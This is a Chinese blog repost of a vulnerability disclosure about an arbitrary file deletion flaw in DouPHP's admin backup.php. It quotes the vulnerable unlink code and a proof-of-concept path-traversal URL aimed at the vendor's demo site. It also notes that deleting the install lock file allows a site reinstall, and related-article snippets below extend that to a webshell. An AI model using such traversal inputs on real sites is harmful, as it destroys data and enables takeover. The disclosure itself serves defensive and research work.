php 轻量级后台,DouPHP轻量级企业建站系统后台任意文件删除缺陷

最新推荐文章于 2022-03-23 22:18:03 发布
最新推荐文章于 2022-03-23 22:18:03 发布
阅读量229 收藏
点赞数
文章标签: php 轻量级后台

### 简要描述:

某处未验证删除的文件路径,导致可以删除任意文件。

官网演示站测试通过

### 详细说明:

漏洞文件: /admin/backup.php

第161行

```

/**

+----------------------------------------------------------

* 备份删除

+----------------------------------------------------------

*/

if ($_REQUEST['rec'] == 'del')

{

$sql_file_name = $_GET['sql_file_name'];

if ($_POST['confirm'])

{

if (file_exists("../data/backup/" . $sql_file_name))

{

@unlink("../data/backup/" . $sql_file_name);

}

$dou->create_admin_log($_LANG['backup_del'] . ": " . $sql_file_name);

$dou->dou_msg($_LANG['backup_del_success'], 'backup.php?rec=restore');

}

else

{

$_LANG['del_check'] = preg_replace('/d%/Ums', $sql_file_name, $_LANG['del_check']);

$dou->dou_msg($_LANG['del_check'], 'backup.php?rec=restore', '', '30', "backup.php?rec=del&sql_file_name=$sql_file_name");

}

}

```

条件:

1、进入此函数需要后台管理员权限

用途?在某些地方,删掉了某些配置,可以导致变量未初始化从而进行利用

比如说安装后生成的lock文件,导致站点可以被重新安装

### 漏洞证明:

http://demo.douco.com/admin/backup.php?rec=del&sql_file_name=../../../robots.txt

[QQ拼音截图未命名.jpg](https://images.seebug.org/upload/201405/13192041b6ba3fad77e6651e69244a36f3165d1f.jpg)

[QQ拼音截图未命名.jpg](https://images.seebug.org/upload/201405/131921146dab22d64d56f0d2cac3b3ba277bd85d.jpg)

loading-bars.svg

链池
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DouPHP轻量级企业网站管理系统(含小程序)源代码
03-18
DouPHP是一款轻量级企业网站管理系统,基于PHP+MYSQL架构的,包含“手机版”、“公众号管理模块”、“小程序”,可以使用它快速搭建一个企业网站。 操作简单 后台简约明了,从使用者而不是开发者的角度出发设计后台...
DouPHP轻量级商城管理系统(作者2次要求)-PHP
06-21
DouPHP轻量级商城管理系统,基于DouPHP核心开发,使用PHP+MYSQL架构的,可以使用它快速搭建一个商城系统DouPHP功能特色(模块全部免费,一键安装)功能性模块:售后服务模块、防伪查询模块、投票模块、自定义表单...
一款PHP轻量级、高性能、前后端分离的电商系统源码.zip
05-09
一款PHP轻量级、高性能、前后端分离的电商系统,支持微信小程序 + H5+ 公众号 + APP,前后端源码100%开源,看见及所得,完美支持二次开发,让您快速搭建个性化独立商城。 技术架构:PHP7.2 + ThinkPHP6.0 + Uni-APP + Ant Design Vue,专注轻量可持续稳定的高可用系统,可学习可商用。 一款PHP轻量级、高性能、前后端分离的电商系统,支持微信小程序 + H5+ 公众号 + APP,前后端源码100%开源,看见及所得,完美支持二次开发,让您快速搭建个性化独立商城。 技术架构:PHP7.2 + ThinkPHP6.0 + Uni-APP + Ant Design Vue,专注轻量可持续稳定的高可用系统,可学习可商用。 一款PHP轻量级、高性能、前后端分离的电商系统,支持微信小程序 + H5+ 公众号 + APP,前后端源码100%开源,看见及所得,完美支持二次开发,让您快速搭建个性化独立商城。 技术架构:PHP7.2 + ThinkPHP6.0 + Uni-APP + Ant Design Vue,专注轻量可持续稳定的高
php任意文件删除漏洞,phpyun二次任意文件删除漏洞
weixin_42513870的博客
04-02 174
### 简要描述:只要有任意文件删除系统绝对崩。我吐个槽,最新的过滤文件实在是太BT了,只要有select and .... 就die()伤不起啊### 详细说明:问题出在 friend\model\index.class.php[](https://images.seebug.org/upload/201401/0119250873aadf723cab3eb6a38f52ad7625c...
php lyadmin,采用Bootstrap3轻量级通用后台 lyadmin
weixin_39894473的博客
03-10 86
lyadmin是一套thinkphp轻量级通用后台,采用Bootstrap3制作,自带权限管理,模块化开发。├─index.php 入口文件│├─Addons 插件目录├─Application 应用模块目录│ ├─Admin 后台模块│ │ ├─Conf 后台配置文件目录│ │ ├─Common 后台函数目录│ │ ├─Controller 后台控制器目录│ │ ├─Model...
php 后端 轻量 框架,GitHub - 22cloud/mixphp: 轻量 PHP 框架,基于 Swoole 的常驻内存型 PHP 高性能框架 (开发文档完善)...
weixin_39724748的博客
03-12 218
高性能 • 轻量级 • 命令行MixPHP 是什么MixPHP 秉承 "普及 PHP 常驻内存型解决方案,促进 PHP 往更后端发展" 的理念而创造,采用 Swoole 扩展作为底层引擎,围绕常驻内存的方式而设计,提供了 Web / Console 开发所需的众多开箱即用的组件,MixPHP 追求简单、实用主义,试图让更多开发者以更低的学习成本享受到 Swoole 带来的高性能与全新的编程体验。与...
php企业后台管理系统模板,DouPHP_admin 蓝色企业CMS后台管理模板 - 下载 - 搜珍网...
weixin_28807529的博客
03-10 143
蓝色企业CMS后台管理模板/蓝色企业CMS后台管理模板/addarticle.html蓝色企业CMS后台管理模板/addmanager.html蓝色企业CMS后台管理模板/addnav.html蓝色企业CMS后台管理模板/addpage.html蓝色企业CMS后台管理模板/addproduct.html蓝色企业CMS后台管理模板/add_article_category.html蓝色企业CMS后台...
DouPHP轻量级企业网站管理系统 v1.3 Release 20160909
12-04
DouPHP 是一款轻量级企业网站管理系统,基于PHP+Mysql架构的,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,系统搭载Smarty模板引擎,支持自定义伪静态,前台模板采用DIV+CSS设计,后台界面设计简洁明了,...
DouPHP轻量级企业网站管理系统 v1.5 Beta3 20180904
10-10
DouPHP 是一款轻量级企业网站管理系统,基于PHP+Mysql架构的,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,系统搭载Smarty模板引擎,支持自定义伪静态,前台模板采用DIV+CSS设计,后
DouPHP轻量级企业网站管理系统 v1.5 Beta1 20180519
10-12
DouPHP 是一款轻量级企业网站管理系统,基于PHP+Mysql架构的,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,系统搭载Smarty模板引擎,支持自定义伪静态,前台模板采用DIV+CSS设计,后
DouPHP模板标签管理器 v1.1
04-18
软件介绍 DouPHP 模板标签管理器是一款DouPHP开源系统的模板标签便捷管理工具,工具集成了在模板制作过程中使用到的各种常用标签,以及常用系统函数,同时软件还集成标签向导,方便大家制作模板。
企业网站DouPHP完整版
12-12
企业网站,包括管理员系统。可以发布产品、文章等。傻瓜式安装操作,轻松搭建企业网站。在我的公司服务器上运行了半年没得问题。
douphp下载中心模块
12-07
douphp下载中心模块,无任何修改。后面有我修改过的源码,欢迎下载
Douphp cms通杀漏洞(小宇特详解)
小宇的web博客
11-15 5397
Douphpcms通杀漏洞 老规矩在分析cms漏洞时,先在本机上安装cms,来进行代码审计。 这个通杀漏洞的原理就是通过找到data文件中的unlink文件进行删除,然后进行重新安装这个站点,然后我们对他进行恶意的传参,然后我拿到这个站点的webshell。 这个靶场是通过cms进行搭建的,我们事先在本地搭建一个 安装成功过后我们进行代码审计然后我们进行全局变量搜索,搜索函数unlink. 然后查找我们可以进行控制的地方,即控制它的传参变量 我们再这里找到了sql_filename这个变量,进去查看
douphp php7.0,DouPHP
weixin_42510835的博客
03-26 188
#本项目暂停更新,有了新的思维。请关注DoMVC框架吧#DoMVC框架为超简单、特方便、极易学而奋斗!#使用说明一、根据入口文件里面所定义的各个常理进行系统配置。二、本系统只有最基础的MVC框架结构,需要其它功能扩展,可以依照框架的扩展方式进行扩展。三、本框架使用的模板语言为PHP原生语言,与CI类似。四、本框架默认会对所有第三方数据(GET、POST、COOKIE)进行转义。#编码约定一、统一文...
轻量级php内容管理系统,一款高速度、轻量级PHP内容管理系统
weixin_29450147的博客
03-12 94
wwwWEB部署目录(或者子目录)├─app应用目录│├─common公共模块目录││├─model公共模型目录│├─admin后台模块目录││├─controller模块控制器目录││├─model模块模型目录│...
DOUPHP后台编辑器从TinyMCE修改为百度UEditor
weixin_43446375的博客
08-16 192
DOUPHP自带的编辑器最不方便的就是不能批量上传图片 修改为百度UEditor就OK了 本次修改了三个文件 在ADMIN下的templates文件夹 article.htm page.htm product.htm 三个文件 修改 至 的两行为以下代码 <script type="text/javascript" charset="utf-8" src="include/UEditor/ueditor.all.min.js"> </script> <script type
[zkaq靶场]代码执行--DouPHP-v1.5漏洞
wwxxee
05-10 977
代码执行 相关函数与语句 eval():会将字符串当作代码来执行。 <?php @eval($_REQUEST["code"])?> 单双引号输出问题: assert():如果传入字符串会被当做PHP代码来执行 <?php @assert($_REQUEST["code"])?> 与eval的区别:eval可以执行多行,而assert只能执行一行。 当assert想要执行多行时,可以利用写文件的方式: file_put_contents("123.php","<?php
漏洞复现之DouPHP_v1.5_Release_20190711cms代码执行漏洞的利用与防御
seek_2022的博客
03-23 5682
文章目录一、代码执行漏洞简介二、DouPHP简介三、PHP双引号的高级用法四、代码审计寻找代码执行漏洞(一)寻找存在代码执行漏洞的点(二)寻找可利用的unlink函数(三)利用代码执行漏洞getshell五、DOUPHP代码执行漏洞总结及防御建议 本文根据网上公开的DOUPHP中安装页面存在的代码执行漏洞进行了代码审计和漏洞复现,并据此提出了针对该漏洞的防御建议。 一、代码执行漏洞简介 RCE(remote command/code execute)命令执行或者代码执行。RCE的原理是用户输入的数据被当做
阿里云轻量级应用服务器可以部署简单APP吗
最新发布
04-29
您可以选择适合您应用程序的操作系统和应用程序类型,然后在阿里云轻量级应用服务器上进行部署,以便您的应用程序可以在云端正常运行。同时,阿里云轻量级应用服务器还提供了高可用、自动化运维等功能,可帮助您更好...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值